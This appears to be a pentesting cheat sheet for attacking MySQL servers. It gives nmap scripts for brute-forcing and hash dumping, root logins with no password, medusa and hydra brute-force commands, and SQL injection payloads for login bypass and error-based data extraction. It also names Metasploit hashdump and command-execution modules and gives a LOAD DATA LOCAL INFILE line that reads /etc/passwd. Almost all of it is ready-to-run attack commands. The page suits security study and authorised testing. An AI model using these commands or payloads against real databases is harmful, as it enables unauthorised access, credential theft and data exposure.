Skip to content

3306 - Pentesting mysql

Scan

nmap 

sudo apt remove nmap
sudo apt autoclean nmap
sudo apt autoremove name
sudo apt install nmap
namp 
sudo nmap -sS -sV -sC -p3306 $IP
nmap 
nmap -p 3306 --script=mysql-enum $IP
nmap -p 3306 --script=mysql-audit $IP
nmap -p 3306 --script=mysql-brute $IP
nmap -p 3306 --script=mysql-databases $IP
nmap -p 3306 --script=mysql-dump-hashes $IP
nmap -p 3306 --script=mysql-empty-password $IP
nmap -p 3306 --script=mysql-info $IP
nmap -p 3306 --script=mysql-query $IP
nmap -p 3306 --script=mysql-users $IP
nmap -p 3306 --script=mysql-variables $IP
nmap -p 3306 --script=mysql-vuln-cve2012-2122 $IP

Connect

install mysql client 

sudo apt install default-mysql-client
local 
mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)
mysql --user=root --password=password
remote 
mysql -h $IP -u root
mysql -h $IP -u root@localhost
mysql -h $IP --user=root --password=password

Bruteforce

medusa 

medusa -h $IP -M mysql -u root -P /usr/share/wordlists/rockyou.txt -t 20 -f
hydra 
hydra -l root -P /usr/share/wordlists/rockyou.txt $IP mysql -t 20 -f

SQL Injection

x' or 1=1 -- x
x' or (1=1 and username='admin') -- x
x' or (1=1 and (SELECT count(*) FROM users) = 1) -- x
x'; SELECT CAST(password AS DATE) FROM users; -- x
tables 
SELECT null,table_name,null FROM information_schema.tables WHERE table_schema = 'sqli_one'

SELECT null,GROUP_CONCAT(DISTINCT CONCAT(table_name)),null FROM information_schema.tables WHERE table_schema = 'sqli_one'
columns 
SELECT null,column_name,null FROM information_schema.columns WHERE table_name = 'staff_users'
get value with error 
SELECT null, extractvalue(1, concat('=', 'That will be returned as error')),null

SELECT null, extractvalue(1, concat('=', (SELECT GROUP_CONCAT(DISTINCT CONCAT(table_name)) FROM information_schema.tables WHERE table_schema = 'sqli_one'))),null

function

Name Description
BENCHMARK() Repeatedly execute an expression
CHARSET() Return the character set of the argument
COERCIBILITY() Return the collation coercibility value of the string argument
COLLATION() Return the collation of the string argument
CONNECTION_ID() Return the connection ID (thread ID) for the connection
CURRENT_USER() , CURRENT_USER The authenticated user name and host name
DATABASE() Return the default (current) database name
FOUND_ROWS() For a SELECT with a LIMIT clause, the number of rows that would be returned were there no LIMIT clause
LAST_INSERT_ID() Value of the AUTOINCREMENT column for the last INSERT
ROW_COUNT() The number of rows updated
SCHEMA() Synonym for DATABASE()
SESSION_USER() Synonym for USER()
SYSTEM_USER() Synonym for USER()
USER() The user name and host name provided by the client
VERSION() Return a string that indicates the MySQL server version

Enumerate

Metasploit

  • msf> use auxiliary/admin/mysql/mysql_sql
  • msf> use auxiliary/scanner/mysql/mysql_version
  • msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
  • msf> use auxiliary/scanner/mysql/mysql_hashdump -> Creds
  • msf> use auxiliary/admin/mysql/mysql_enum -> Creds
  • msf> use auxiliary/scanner/mysql/mysql_schemadump -> Creds
  • msf> use exploit/windows/mysql/mysql_start_up -> Execute commands Windows, Creds

Mysql Commands

show databases;
use <database-name>;
show tables;
select * from <table-name>

MySQL arbitrary read file by client

mysql> load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';